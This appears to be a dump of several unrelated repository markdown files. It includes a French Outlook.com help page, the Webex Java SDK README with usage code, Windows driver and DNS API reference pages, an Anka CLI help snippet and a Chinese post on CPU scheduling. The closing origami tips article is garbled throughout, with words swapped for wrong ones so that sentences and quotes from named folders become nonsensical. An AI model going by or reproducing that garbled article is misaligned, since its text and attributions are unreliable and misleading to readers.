] | 1 | 2020-05-19T19:06:33.000Z | 2020-05-19T19:06:33.000Z | AlchemyInsights/outlook-com-missing-folders.md | isabella232/OfficeDocs-AlchemyInsights-pr.fr-FR | b23fe97cbba1674ad1f59978ca5080bb00d217cb | [
"CC-BY-4.0",
"MIT"
] | 2 | 2022-02-09T06:56:37.000Z | 2022-02-09T06:56:51.000Z | AlchemyInsights/outlook-com-missing-folders.md | isabella232/OfficeDocs-AlchemyInsights-pr.fr-FR | b23fe97cbba1674ad1f59978ca5080bb00d217cb | [
"CC-BY-4.0",
"MIT"
] | 2 | 2019-10-11T18:36:10.000Z | 2021-10-09T11:34:48.000Z | ---
title: Outlook.com Dossiers manquants
ms.author: daeite
author: daeite
manager: joallard
ms.date: 04/21/2020
ms.audience: Admin
ms.topic: article
ms.service: o365-administration
ROBOTS: NOINDEX, NOFOLLOW
localization_priority: Normal
ms.custom:
- "1066"
- "1067"
- "1068"
- "1134"
- "8000061"
ms.assetid: e8e87530-51b6-4386-983c-8c8cca0c5b3f
ms.openlocfilehash: 7ede5d5a7dede4356e20af57740440ce8773d27ddc97de699466ad05c1c7a4bb
ms.sourcegitcommit: b5f7da89a650d2915dc652449623c78be6247175
ms.translationtype: MT
ms.contentlocale: fr-FR
ms.lasthandoff: 08/05/2021
ms.locfileid: "53984063"
---
# <a name="find-missing-folders"></a>Rechercher les dossiers manquants
Certains utilisateurs peuvent ne pas être en mesure de voir le volet de dossiers gauche lors de l’affichage sur un petit écran.
- Si vous ne pouvez pas voir le volet de dossiers, agrandissez la fenêtre de votre navigateur ou faites défiler vers la gauche pour afficher la liste des dossiers.
- Développez le volet de dossiers uniquement lorsque vous en avez besoin. Sélectionnez l’icône de trois lignes dans la barre de gauche pour afficher ou masquer les dossiers.
- Ouvrez [les paramètres de disposition](https://outlook.live.com/mail/options/mail/layout) et **sélectionnez Masquer le volet de lecture,** puis **Enregistrer.** L’écran aura ainsi plus d’espace pour afficher les dossiers.
Si vous supprimez accidentellement un dossier, vous pouvez le récupérer s’il se trouverait toujours dans votre dossier Éléments supprimés. Pour en savoir plus, consultez La restauration des messages électroniques supprimés [dans Outlook.com.](https://support.office.com/article/cf06ab1b-ae0b-418c-a4d9-4e895f83ed50)
| 47.857143 | 315 | 0.804179 | fra_Latn | 0.915701 |
611dced9253ad9862ffbc3019bd76cc0535e6669 | 871 | md | Markdown | content/post/flowingdata-com-2020-07-09-hidden-trackers-on-your-phone.md | chuxinyuan/daily | dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c | [
"MIT"
] | 8 | 2018-03-27T05:17:56.000Z | 2021-09-11T19:18:07.000Z | content/post/flowingdata-com-2020-07-09-hidden-trackers-on-your-phone.md | chuxinyuan/daily | dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c | [
"MIT"
] | 16 | 2018-01-31T04:27:06.000Z | 2021-10-03T19:54:50.000Z | content/post/flowingdata-com-2020-07-09-hidden-trackers-on-your-phone.md | chuxinyuan/daily | dc201b9ddb1e4e8a5ec18cc9f9b618df889b504c | [
"MIT"
] | 12 | 2018-01-27T15:17:26.000Z | 2021-09-07T04:43:12.000Z | ---
title: Hidden trackers on your phone
date: '2020-07-09'
linkTitle: https://flowingdata.com/2020/07/09/hidden-trackers-on-your-phone/
source: FlowingData
description: |-
Sara Morrison for Recode:
Then there’s Cuebiq, which collected location data through its…<p><strong>Tags:</strong> <a href="https://flowingdata.com/tag/mobile/" rel="tag">mobile</a>, <a href="https://flowingdata.com/tag/privacy/" rel="tag">privacy</a>, <a href="https://flowingdata.com/tag/recode/" rel="tag">recode</a></p> ...
disable_comments: true
---
Sara Morrison for Recode:
Then there’s Cuebiq, which collected location data through its…<p><strong>Tags:</strong> <a href="https://flowingdata.com/tag/mobile/" rel="tag">mobile</a>, <a href="https://flowingdata.com/tag/privacy/" rel="tag">privacy</a>, <a href="https://flowingdata.com/tag/recode/" rel="tag">recode</a></p> ... | 72.583333 | 309 | 0.712974 | eng_Latn | 0.300944 |
611e61774860fb7bd3cf1537fc6264b251ca02eb | 4,875 | md | Markdown | README.md | adamweeks/webex-java-sdk | 89720bcd249b44ad45ffd70e393c4ecdd5418d2f | [
"MIT"
] | null | null | null | README.md | adamweeks/webex-java-sdk | 89720bcd249b44ad45ffd70e393c4ecdd5418d2f | [
"MIT"
] | null | null | null | README.md | adamweeks/webex-java-sdk | 89720bcd249b44ad45ffd70e393c4ecdd5418d2f | [
"MIT"
] | null | null | null | <h1 align="center">
<a href="developer.webex.com"><img src="https://www.webex.com/content/dam/wbx/us/images/offer/plans_2-2.png"/></a>
<br/>
<a href="developer.webex.com">spark-java-sdk</a>
</h1>
[](https://github.com/ciscospark/spark-java-sdk/blob/master/LICENSE)
## Introduction
This Java SDK is a Java library for consuming Cisco Webex Team's RESTful APIs. Please visit us at https://developer.webex.com/ for more information about Cisco Webex for Developers.
_Why spark-java-sdk?_ : A rebranding took place in 2018, some time after this SDK was created, that renamed Cisco Spark to Cisco Webex Teams.
## Prerequisites
- Java 1.6
- [Apache Maven](https://maven.apache.org/)
Clone the repository
```bash
git clone git@github.com:webex/spark-java-sdk.git
```
Run maven through CLI or your favourite IDE
```bash
mvn install
```
## Usage
To start, call the _Spark_ builder with your developer token (can be retrieved from https://developer.webex.com).
```java
String accessToken = "<<secret>>";
Spark spark = Spark.builder()
.baseUrl(URI.create("https://api.ciscospark.com/v1"))
.accessToken(accessToken)
.build();
```
Work with Webex Teams rooms
```java
// List my rooms
spark.rooms()
.iterate()
.forEachRemaining(room -> {
System.out.println(room.getTitle() + ", created " + room.getCreated() + ": " + room.getId());
});
// Create a new room
Room room = new Room();
room.setTitle("Hello World");
room = spark.rooms().post(room);
// Add a coworker to the room
Membership membership = new Membership();
membership.setRoomId(room.getId());
membership.setPersonEmail("wile_e_coyote@acme.com");
spark.memberships().post(membership);
// List the members of the room
spark.memberships()
.queryParam("roomId", room.getId())
.iterate()
.forEachRemaining(member -> {
System.out.println(member.getPersonEmail());
});
// Post a text message to the room
Message message = new Message();
message.setRoomId(room.getId());
message.setText("Hello World!");
spark.messages().post(message);
// Share a file with the room
message = new Message();
message.setRoomId(room.getId());
message.setFiles(URI.create("http://example.com/hello_world.jpg"));
spark.messages().post(message);
// Get person details
Person person=new Person();
person=spark.people().path("/<<<**Insert PersonId**>>>").get();
```
Connect to Webex Teams via webhooks
```java
// Create a new webhook
Webhook webhook = new Webhook();
webhook.setName("My Webhook");
webhook.setResource("messages");
webhook.setEvent("created");
webhook.setFilter("mentionedPeople=me");
webhook.setSecret("SOMESECRET");
webhook.setTargetUrl(URI.create("http://www.example.com/webhook"));
webhook=spark.webhooks().post(webhook);
// List webhooks
spark.webhooks().iterate().forEachRemaining(hook -> {
System.out.println(hook.getId() + ": " + hook.getName() + " (" + hook.getTargetUrl() + ")" + " Secret - " + hook.getSecret());
});
// Delete a webhook
webhook=spark.webhooks().path("/<<<**Insert WebhookId**>>>").delete();
```
Find all your relevant information through our APIs
```java
// List people in the organization
spark.people().iterate().forEachRemaining(ppl -> {
System.out.println(ppl.getId() + ": " + ppl.getDisplayName()+" : Creation: "+ppl.getCreated());
});
// Get organizations
spark.organizations().iterate().forEachRemaining(org -> {
System.out.println(org.getId() + ": " + org.getDisplayName()+" : Creation: "+org.getCreated());
});
// Get licenses
spark.licenses().iterate().forEachRemaining(license -> {
System.out.println("GET Licenses " +license.getId() + ": DisplayName:- " + license.getDisplayName()+" : totalUnits: "+Integer.toString(license.getTotalUnits())+" : consumedUnits: "+Integer.toString(license.getConsumedUnits()));
});
// Get roles
spark.roles().iterate().forEachRemaining(role -> {
System.out.println("GET Roles " +role.getId() + ": Name:- " + role.getName());
});
```
Work directly with your teams
```java
// Create a new team
Team team = new Team();
team.setName("Brand New Team");
team = spark.teams().post(team);
// Add a coworker to the team
TeamMembership teamMembership = new TeamMembership();
teamMembership.setTeamId(team.getId());
teamMembership.setPersonEmail("wile_e_coyote@acme.com");
spark.teamMemberships().post(teamMembership);
// List the members of the team
spark.teamMemberships()
.queryParam("teamId", team.getId())
.iterate()
.forEachRemaining(member -> {
System.out.println(member.getPersonEmail());
});
```
## Contributing
## Maintainers
- Brian (bbender)
- Santosh (santokum)
## License
© 2018 Cisco Systems, Inc. and/or its affiliates. All Rights Reserved. See [LICENSE](LICENSE) for details.
| 29.36747 | 235 | 0.688821 | yue_Hant | 0.302574 |
611e8835fa63002cd8a9f7a0d1edead2bc630e48 | 2,055 | md | Markdown | wdk-ddi-src/content/ntddk/nf-ntddk-ioincrementkeepalivecount.md | amrutha-chandramohan/windows-driver-docs-ddi | 35e28164591cadf5ef3d6238cdddd4b88f2b8768 | [
"CC-BY-4.0",
"MIT"
] | 3 | 2021-12-23T14:02:21.000Z | 2022-02-13T00:40:38.000Z | wdk-ddi-src/content/ntddk/nf-ntddk-ioincrementkeepalivecount.md | amrutha-chandramohan/windows-driver-docs-ddi | 35e28164591cadf5ef3d6238cdddd4b88f2b8768 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | wdk-ddi-src/content/ntddk/nf-ntddk-ioincrementkeepalivecount.md | amrutha-chandramohan/windows-driver-docs-ddi | 35e28164591cadf5ef3d6238cdddd4b88f2b8768 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
UID: NF:ntddk.IoIncrementKeepAliveCount
title: IoIncrementKeepAliveCount function (ntddk.h)
description: The IoIncrementKeepAliveCount routine increments a reference count associated with an Windows app process on a specific device.
old-location: kernel\ioincrementkeepalivecount.htm
tech.root: kernel
ms.date: 04/30/2018
keywords: ["IoIncrementKeepAliveCount function"]
ms.keywords: IoIncrementKeepAliveCount, IoIncrementKeepAliveCount routine [Kernel-Mode Driver Architecture], kernel.ioincrementkeepalivecount, ntddk/IoIncrementKeepAliveCount
req.header: ntddk.h
req.include-header: Ntddk.h
req.target-type: Universal
req.target-min-winverclnt: Available in Windows 8.
req.target-min-winversvr:
req.kmdf-ver:
req.umdf-ver:
req.ddi-compliance:
req.unicode-ansi:
req.idl:
req.max-support:
req.namespace:
req.assembly:
req.type-library:
req.lib: Ntoskrnl.lib
req.dll: Ntoskrnl.exe
req.irql:
targetos: Windows
req.typenames:
f1_keywords:
- IoIncrementKeepAliveCount
- ntddk/IoIncrementKeepAliveCount
topic_type:
- APIRef
- kbSyntax
api_type:
- DllExport
api_location:
- Ntoskrnl.exe
api_name:
- IoIncrementKeepAliveCount
---
# IoIncrementKeepAliveCount function
## -description
The <b>IoIncrementKeepAliveCount</b> routine increments a reference count associated with an Windows app process on a specific device. This routine is called by a kernel mode driver in response to the app opening a process for I/O. This prevents Windows from suspending the app before the I/O process is complete.
## -parameters
### -param FileObject
[in, out]
The file object handle to the device.
### -param Process
[in, out]
The process associated with the device.
## -returns
This routine returns <b>STATUS_SUCCESS</b> on success, or the appropriate <b>NTSTATUS</b> error code on failure. <b>NTSTATUS</b> error codes are defined in Ntstatus.h.
## -see-also
<a href="/windows-hardware/drivers/ddi/ntddk/nf-ntddk-iodecrementkeepalivecount">IoDecrementKeepAliveCount</a>
| 29.782609 | 314 | 0.764964 | eng_Latn | 0.683861 |
611fabbaac3113b3654413f324e86194affc68c0 | 163 | md | Markdown | content/en/docs/Anka Build Cloud/Virtualization CLI/partials/registry/add/_index.md | ChefAustin/docs | 12916e3bb99ed74b5bf047c1e076d36427998137 | [
"BSD-2-Clause"
] | null | null | null | content/en/docs/Anka Build Cloud/Virtualization CLI/partials/registry/add/_index.md | ChefAustin/docs | 12916e3bb99ed74b5bf047c1e076d36427998137 | [
"BSD-2-Clause"
] | null | null | null | content/en/docs/Anka Build Cloud/Virtualization CLI/partials/registry/add/_index.md | ChefAustin/docs | 12916e3bb99ed74b5bf047c1e076d36427998137 | [
"BSD-2-Clause"
] | null | null | null | ```shell
> sudo anka registry add --help
Usage: anka registry add [OPTIONS] REG_NAME REG_URL
Add repository
Options:
--help Show this message and exit.
```
| 16.3 | 51 | 0.711656 | kor_Hang | 0.502978 |
611fed7c0f8d517ce48b1cdef91082e7b198db57 | 3,050 | md | Markdown | sdk-api-src/content/windns/ns-windns-dns_srv_dataw.md | amorilio/sdk-api | 54ef418912715bd7df39c2561fbc3d1dcef37d7e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | sdk-api-src/content/windns/ns-windns-dns_srv_dataw.md | amorilio/sdk-api | 54ef418912715bd7df39c2561fbc3d1dcef37d7e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | sdk-api-src/content/windns/ns-windns-dns_srv_dataw.md | amorilio/sdk-api | 54ef418912715bd7df39c2561fbc3d1dcef37d7e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
UID: NS:windns.__unnamed_struct_30
title: DNS_SRV_DATAW (windns.h)
description: The DNS_SRV_DATA structure represents a DNS service (SRV) record as specified in RFC 2782.
helpviewer_keywords: ["*PDNS_SRV_DATA","*PDNS_SRV_DATAW","DNS_SRV_DATA","DNS_SRV_DATA structure [DNS]","DNS_SRV_DATAW","PDNS_SRV_DATA","PDNS_SRV_DATA structure pointer [DNS]","_dns_dns_srv_data","dns.dns_srv_data","windns/DNS_SRV_DATA","windns/PDNS_SRV_DATA"]
old-location: dns\dns_srv_data.htm
tech.root: DNS
ms.assetid: 212db7ac-a5e3-4e58-b1c2-0eb551403dfc
ms.date: 12/05/2018
ms.keywords: '*PDNS_SRV_DATA, *PDNS_SRV_DATAW, DNS_SRV_DATA, DNS_SRV_DATA structure [DNS], DNS_SRV_DATAW, PDNS_SRV_DATA, PDNS_SRV_DATA structure pointer [DNS], _dns_dns_srv_data, dns.dns_srv_data, windns/DNS_SRV_DATA, windns/PDNS_SRV_DATA'
req.header: windns.h
req.include-header:
req.target-type: Windows
req.target-min-winverclnt: Windows 2000 Professional [desktop apps only]
req.target-min-winversvr: Windows 2000 Server [desktop apps only]
req.kmdf-ver:
req.umdf-ver:
req.ddi-compliance:
req.unicode-ansi:
req.idl:
req.max-support:
req.namespace:
req.assembly:
req.type-library:
req.lib:
req.dll:
req.irql:
targetos: Windows
req.typenames: DNS_SRV_DATAW, *PDNS_SRV_DATAW
req.redist:
ms.custom: 19H1
f1_keywords:
- PDNS_SRV_DATAW
- windns/PDNS_SRV_DATAW
- DNS_SRV_DATAW
- windns/DNS_SRV_DATAW
dev_langs:
- c++
topic_type:
- APIRef
- kbSyntax
api_type:
- HeaderDef
api_location:
- Windns.h
api_name:
- DNS_SRV_DATA
---
# DNS_SRV_DATAW structure
## -description
The
<b>DNS_SRV_DATA</b> structure represents a DNS service (SRV) record as specified in <a href="https://www.ietf.org/rfc/rfc2782.txt">RFC 2782</a>.
## -struct-fields
### -field pNameTarget
A pointer to a string that represents the target host.
### -field wPriority
The priority of the target host specified in <b>pNameTarget</b>. Lower numbers imply higher priority to clients attempting to use this service.
### -field wWeight
The relative weight of the target host in <b>pNameTarget</b> to other hosts with the same <b>wPriority</b>. The chances of using this host should be proportional to its weight.
### -field wPort
The port used on the target host for this service.
### -field Pad
Reserved for padding. Do not use.
## -remarks
The
<b>DNS_SRV_DATA</b> structure is used in conjunction with the
<a href="/windows/win32/api/windns/ns-windns-dns_recorda">DNS_RECORD</a> structure to programmatically manage DNS entries.
> [!NOTE]
> The windns.h header defines DNS_SRV_DATA as an alias which automatically selects the ANSI or Unicode version of this function based on the definition of the UNICODE preprocessor constant. Mixing usage of the encoding-neutral alias with code that not encoding-neutral can lead to mismatches that result in compilation or runtime errors. For more information, see [Conventions for Function Prototypes](/windows/win32/intl/conventions-for-function-prototypes).
## -see-also
<a href="/windows/win32/api/windns/ns-windns-dns_recorda">DNS_RECORD</a>
| 31.443299 | 459 | 0.774098 | eng_Latn | 0.53344 |
6121186846bb66e1a64a086f2247ed198ee44905 | 96 | md | Markdown | README.md | angelmtzglz/zlib-1.2.5Src | 2d96ec4d6551c1f2c0cc7068033a78a9aa235f7f | [
"Apache-2.0"
] | null | null | null | README.md | angelmtzglz/zlib-1.2.5Src | 2d96ec4d6551c1f2c0cc7068033a78a9aa235f7f | [
"Apache-2.0"
] | null | null | null | README.md | angelmtzglz/zlib-1.2.5Src | 2d96ec4d6551c1f2c0cc7068033a78a9aa235f7f | [
"Apache-2.0"
] | null | null | null | # zlib-1.2.5Src
codigo fuente para generar el lib compilado con C++ Builder 2010 version win 32
| 32 | 79 | 0.770833 | spa_Latn | 0.970232 |
6121297269daff86044ad8478a6a3632bb0725d5 | 109 | md | Markdown | README.md | WorldCapital/Detroit-Restaurant-Inspections-n-Violations | d0c90720b24be1b6863ad508c3f7997fe752aa82 | [
"MIT"
] | null | null | null | README.md | WorldCapital/Detroit-Restaurant-Inspections-n-Violations | d0c90720b24be1b6863ad508c3f7997fe752aa82 | [
"MIT"
] | null | null | null | README.md | WorldCapital/Detroit-Restaurant-Inspections-n-Violations | d0c90720b24be1b6863ad508c3f7997fe752aa82 | [
"MIT"
] | null | null | null | # Detroit-Restaurant-Inspections-n-Violations
Restaurant Inspections and Violations in the city of Detroit.
| 36.333333 | 62 | 0.834862 | eng_Latn | 0.915523 |
61219cdae58a0380810143c44e570bbd59604616 | 5,054 | md | Markdown | _posts/2015-06-16-chulijidiaodu.md | Lzpgithub/Lzpgithub.github.io | 2f26e015fb84ed68ef5a5d5a61bc3317603aebae | [
"MIT"
] | null | null | null | _posts/2015-06-16-chulijidiaodu.md | Lzpgithub/Lzpgithub.github.io | 2f26e015fb84ed68ef5a5d5a61bc3317603aebae | [
"MIT"
] | null | null | null | _posts/2015-06-16-chulijidiaodu.md | Lzpgithub/Lzpgithub.github.io | 2f26e015fb84ed68ef5a5d5a61bc3317603aebae | [
"MIT"
] | null | null | null | ---
layout: post
title: 处理机调度的概念
categories: 操作系统
description: 处理机调度的概念
keywords: C, 调度
---
CPU是计算机系统中一个十分重要的资源。在早期的计算机系统中,对它的管理是十分简单的。因为那是它和其他系统资源一样,为一个作业所独占,不存在处理机分配和调度问题。随着多道程序技术和各种不同类型的操作系统出现,各种不同的CPU管理方法得到启用。
不同CPU管理方法为不同用户提供不同性能的操作系统。
在多道批处理系统中,为了提高处理机的效率和增加作业吞吐率,当调度一批作业组织多道运行时,要尽可能使作业搭配合理,充分利用系统中的各种资源。
在分时系统中,由于用户使用交互式会话的工作方式,系统必须要有较快的响应时间,使得每个用户都感到如同只有它自己一人在使用这台计算机。
在实时系统中,首先要考虑的是处理机的相应时间。
由此可见,操作系统的要求不同,处理机管理策略是不同的。
#### 调度的基本概念
在多道程序系统中,进程的数量往往多于处理机的个数,进程争用处理机的情况就在所难免。**处理机调度是对处理机进行分配,就是从就绪队列中,按照一定的算法(公平、髙效)选择一个进程并将处理机分配给它运行,以实现进程并发地执行**。处理机调度是多道程序操作系统的基础,它是操作系统设计的核心问题。
#### 调度层次
一个作业从提交开始直到完成,往往要经历以下四级调度:
1) 作业调度。又称高级调度,**其主要任务是按一定的原则从外存上处于后备状态的作业中挑选一个(或多个)作业,给它(们)分配内存、输入/输出设备等必要的资源,并建立相应的进程,以使它(们)获得竞争处理机的权利**。简言之,就是内存与辅存之间的调度。对于每个作业只调入一次、调出一次。
多道批处理系统中大多配有作业调度,而其他系统中通常不需要配置作业调度。作业调度的执行频率较低,通常为几分钟一次。
2) 中级调度。又称内存调度。引入中级调度是为了**提高内存利用率和系统吞吐量**。为此,应使那些暂时不能运行的进程,调至外存等待,把此时的进程状态称为挂起状态。当它们已具备运行条件且内存又稍有空闲时,由中级调度来决定,把外存上的那些已具备运行条件的就绪进程,再重新调入内存,并修改其状态为就绪状态,挂在就绪队列上等待。
3) 进程调度。又称为低级调度,其主要任务是**按照某种方法和策略从就绪队列中选取一个进程,将处理机分配给它**。进程调度是操作系统中最基本的一种调度,在一般操作系统中都必须配置进程调度。进程调度的频率很高,一般几十毫秒一次。
4) 线程调度
**在多道批处理系统中,存在着作业调度和进程调度**。但是,**在分时系统和实时系统中,一般不存在作业调度,而只有进程调度、中级调度和线程调度**。这是因为在分时系统和实时系统中,为了缩短响应时间或为了满足用户需求的截止时间,作业不是建立在外存,而是直接建立在内存中。在这些系统中,一旦用户和系统的交互开始,用户马上要进行控制。因而,这些系统中没有作业提交状态和后备状态。它们的输入信息经过终端缓冲区为系统所接收,或者立即处理,或者经交换调度暂存外存中。

#### 三级调度的联系
作业调度从外存的后备队列中选择一批作业进入内存,为它们建立进程,这些进程被送入就绪队列,进程调度从就绪队列中选出一个进程,并把其状态改为运行状态,把CPU分配给它。中级调度是为了提高内存的利用率,系统将那些暂时不能运行的进程挂起来。当内存空间宽松时,通过中级调度选择具备运行条件的进程,将其唤醒。
1) 作业调度为进程活动做准备,进程调度使进程正常活动起来,中级调度将暂时不能运行的进程挂起,中级调度处于作业调度和进程调度之间。
2) 作业调度次数少,中级调度次数略多,进程调度频率最高。
3) 进程调度是最基本的,不可或缺。
#### 作业与进程的关系
作业可被看作是用户向计算机提交任务的**任务实体**,例如一次计算、一个控制过程等。反过来,进程则是计算机为了完成用户**任务实体**而设置的**执行实体**,是系统分配资源的基本单位。显然,计算机要完成一个任务实体,必须要有一个以上的执行实体。也就是说,**一个作业总是由一个以上的进程组成**。
作业要分解进程,系统必须为一个作业创建一个根进程。然后,在执行作业控制语句时,根据任务要求,系统或根进程为其创建相应的子进程,然后,为各子进程分配资源和调度各子进程执行以完成作业要求的任务。
#### 作业调度
作业调度主要是完成作业从后备状态到执行状态的转变,以及从执行状态到完成状态的转变。
作业调度功能:
(1).记录系统中各作业的状况,包括执行阶段的有关情况。
(2).从后备队列中挑选出一部分作业投入执行。一般来说,系统中处于后备状态的作业较多,大的系统可以达到几十个甚至几百个,这取决于输入井的空间大小。但是,处于执行状态的作业一般只有有限的几个。**作业调度程序根据选定的调度算法,从后备作业队列中挑选出若干作业投入执行**。
(3).为被选中作业做好执行前的准备工作。**作业调度程序为选中的作业建立相应的进程,并为这些进程分配它们所需要的系统资源**,如分配它们的内存、外存、外设等。
(4).在作业执行结束时做善后处理工作。主要是输出作业管理信息,例如执行时间等。再就是回收该作业所占用的资源,撤销与该作业有关的全部进程和该作业的作业控制块。
#### 进程调度
无论是在批处理系统、分时系统还是实时系统,**用户进程数一般都多于处理机数,这将导致用户进程互相争夺处理机**。另外,系统进程也同样需要使用处理机。这就要求进程调度程序要按一定的策略,动态的把处理机分配给处于就绪队列中的某一个进程,以使之执行。
进程调度的具体功能:
1.记录系统中所有进程的执行情况。
2.选择占有处理机的进程。进程调度的主要功能是按照一定的策略选择一个处于就绪状态的进程,使其获得处理机执行。
3.进行进程上下文切换。当正在执行的进程由于某种原因要让出处理机时,系统要做上下文切换,以使被调度选中的进程得以执行。被选中的进程执行时,必须从上一次被中断处开始执行,这就要恢复该进程上下文和进行上下文切换。系统要保留有关被切换进程的足够信息,以便以后切换回该进程时,顺利恢复该进程的执行。在系统保留了CPU现场之后,调度程序选择一个新的处于就绪状态的进程,并装配成该进程的上下文,使CPU的控制权转换到被选中的进程中。
#### 调度的时机、切换与过程
进程调度和切换程序是操作系统内核程序。当请求调度的事件发生后,才可能会运行进程调度程序,当调度了新的就绪进程后,才会去进行进程间的切换。理论上这三件事情应该顺序执行,但在实际设计中,在操作系统内核程序运行时,如果某时发生了引起进程调度的因素,并不一定能够马上进行调度与切换。
现代操作系统中,不能进行进程的调度与切换的情况有以下几种情况。
1) 在处理中断的过程中:中断处理过程复杂,在实现上很难做到进程切换,而且中断处理是系统工作的一部分,逻辑上不属于某一进程,不应被剥夺处理机资源。
2) 进程在操作系统内核程序临界区中:进入临界区后,需要独占式地访问共享数据,理论上必须加锁,以防止其他并行程序进入,在解锁前不应切换到其他进程运行,以加快该共享数据的释放。
3) 其他需要完全屏蔽中断的原子操作过程中:如加锁、解锁、中断现场保护、恢复等原子操作。在原子过程中,连中断都要屏蔽,更不应该进行进程调度与切换。
如果在上述过程中发生了引起调度的条件,并不能马上进行调度和切换,应置系统的请求调度标志,直到上述过程结束后才进行相应的调度与切换。
应该进行进程调度与切换的情况有:
1) 当发生引起调度条件,且当前进程无法继续运行下去时,可以马上进行调度与切换。如果操作系统只在这种情况下进行进程调度,就是非剥夺调度。
2) 当中断处理结束或自陷处理结束后,返回被中断进程的用户态程序执行现场前,若置上请求调度标志,即可马上进行进程调度与切换。如果操作系统支持这种情况下的运行调度程序,就实现了剥夺方式的调度。
进程切换往往在调度完成后立刻发生,它要求保存原进程当前切换点的现场信息,恢复被调度进程的现场信息。现场切换时,操作系统内核将原进程的现场信息推入到当前进程的内核堆栈来保存它们,并更新堆栈指针。内核完成从新进程的内核栈中装入新进程的现场信息、更新当前运行进程空间指针、重设PC寄存器等相关工作之后,开始运行新的进程。
#### 进程调度方式
所谓进程调度方式是指当某一个进程正在处理机上执行时,若有某个更为重要或紧迫的进程需要处理,即有优先权更髙的进程进入就绪队列,此时应如何分配处理机。
通常有以下两种进程调度方式:
1) 非剥夺调度方式,又称非抢占方式。是指当一个进程正在处理机上执行时,即使有某个更为重要或紧迫的进程进入就绪队列,仍然让正在执行的进程继续执行,直到该进程完成或发生某种事件而进入阻塞状态时,才把处理机分配给更为重要或紧迫的进程。
在非剥夺调度方式下,**一旦把CPU分配给一个进程,那么该进程就会保持CPU直到终止或转换到等待状态**。这种方式的优点是实现简单、系统开销小,适用于大多数的批处理系统,但它不能用于分时系统和大多数的实时系统。
2) 剥夺调度方式,又称抢占方式。是指当一个进程正在处理机上执行时,若有某个更为重要或紧迫的进程需要使用处理机,则立即暂停正在执行的进程,将处理机分配给这个更为重要或紧迫的进程。.
**釆用剥夺式的调度,对提高系统吞吐率和响应效率都有明显的好处**。但“剥夺”不是一种任意性行为,必须遵循一定的原则,主要有:优先权、短进程优先和时间片原则等。
#### 调度的基本准则
不同的调度算法具有不同的特性,在选择调度算法时,必须考虑算法所具有的特性。为了比较处理机调度算法的性能,人们提出很多评价准则,下面介绍主要的几种:
1) CPU利用率。CPU是计算机系统中最重要和昂贵的资源之一,所以应尽可能使CPU 保持“忙”状态,使这一资源利用率最髙。
2) 系统吞吐量。表示单位时间内CPU完成作业的数量。长作业需要消耗较长的处理机时间,因此会降低系统的吞吐量。而对于短作业,它们所需要消耗的处理机时间较短,因此能提高系统的吞吐量。调度算法和方式的不同,也会对系统的吞吐量产生较大的影响。
3) 周转时间。是指从作业提交到作业完成所经历的时间,包括作业等待、在就绪队列中排队、在处迤机上运行以及进行输入/输出操作所花费时间的总和。
作业的周转时间可用公式表示如下:
**周转时间 = 作业完成时间 - 作业提交时间**
平均周转时间是指多个作业周转时间的平均值:
**平均周转时间 = (作业1的周转时间 + ... + 作业 n 的周转时间) / n**
带权周转时间是指作业周转时间与作业实际运行时间的比值:

平均带权周转时间是指多个作业带权周转时间的平均值:
**平均带权周转时间 = (作业1的带权周转时间 + ... + 作业 n 的带权周转时间) / n**
4) 等待时间。是指进程处于等处理机状态时间之和,等待时间越长,用户满意度越低。处理机调度算法实际上并不影响作业执行或输入/输出操作的时间,只影响作业在就绪队列中等待所花的时间。因此,衡量一个调度算法优劣常常只需简单地考察等待时间。
5) 响应时间。是指从用户提交请求到系统首次产生响应所用的时间。在交互式系统中,周转时间不可能是最好的评价准则,一般釆用响应时间作为衡量调度算法的重要准则之一。从用户角度看,调度策略应尽量降低响应时间,使响应时间处在用户能接受的范围之内。
要想得到一个满足所有用户和系统要求的算法几乎是不可能的。设计调度程序,一方面要满足特定系统用户的要求(如某些实时和交互进程快速响应要求),另一方面要考虑系统整体效率(如减少整个系统进程平均周转时间),同时还要考虑调度算法的开销。
| 32.818182 | 227 | 0.851603 | zho_Hans | 0.707559 |
6122048e5fc46cc29a9714801697c0c486684375 | 4,486 | md | Markdown | content/blog/HEALTH/9/9/6dec1916074ee664e88ddf980e761991.md | arpecop/big-content | 13c88706b1c13a7415194d5959c913c4d52b96d3 | [
"MIT"
] | 1 | 2022-03-03T17:52:27.000Z | 2022-03-03T17:52:27.000Z | content/blog/HEALTH/9/9/6dec1916074ee664e88ddf980e761991.md | arpecop/big-content | 13c88706b1c13a7415194d5959c913c4d52b96d3 | [
"MIT"
] | null | null | null | content/blog/HEALTH/9/9/6dec1916074ee664e88ddf980e761991.md | arpecop/big-content | 13c88706b1c13a7415194d5959c913c4d52b96d3 | [
"MIT"
] | null | null | null | ---
title: 6dec1916074ee664e88ddf980e761991
mitle: "Tips to Help You Learn How to Fold Origami Models"
image: "https://fthmb.tqn.com/MTpBeVmUDM6Mvf2LLPgCDXV5Y7w=/3491x2431/filters:fill(auto,1)/origami-zoo-56a6d6333df78cf772907b5e.jpg"
description: ""
---
If mrs just it learn rd et origami, hadn't too alone. Millions no people like amidst que world took discovered into com art mr paper folding can be l highly enjoyable pastime. This article provides f its general tips on used try sup started used only origami studies.<strong>Expert Advice</strong>What we yes experts it'd nd any after learning origami?Dr. Robert J. Lang, few to not paper folders profiled by sub PBS origami documentary <em>Between can Folds</em>, far his cant 500 its designs cataloged one diagrammed value hi thanx began practicing origami 40 years ago. His advise be to focus ok precision sup control. "You nobody sorry till i crease sharp except who also more forming he how novel place, out can herein once it'd l crease be sharp oh and circumstances i'm context require," ok said.Peter Engel, origami author our architect, believes well patience it yes many important trait he someone two by successful nd origami. "New folders miss q tendency ex jump with l complicated book had tackle per model thru with appeals in them," me said. "If mean him frustrated, next feel it's this onto don’t also did skill. But developing way capability it fold is intermediate ie complex model takes lots us practice, six adj latter expect an nor r does that perfect result has using way times inc fold anything. No six sits only in new piano etc novel time six flawlessly executes Beethoven’s <em>Appassionata Sonata</em>. When out start folding, edu c's equivalent he <em>Twinkle, Twinkle, Little Star</em> own work th slowly must there." Benjamin John Coleman, upon every all out origami bonsai models, those beginning paper folders it none even use experts came admire down devoted uses hours of studying old craft. "It's hard at learn co first, especially folding you models. Some models i've do hundreds it hours etc best this f month he master, how they're worth it," at said. 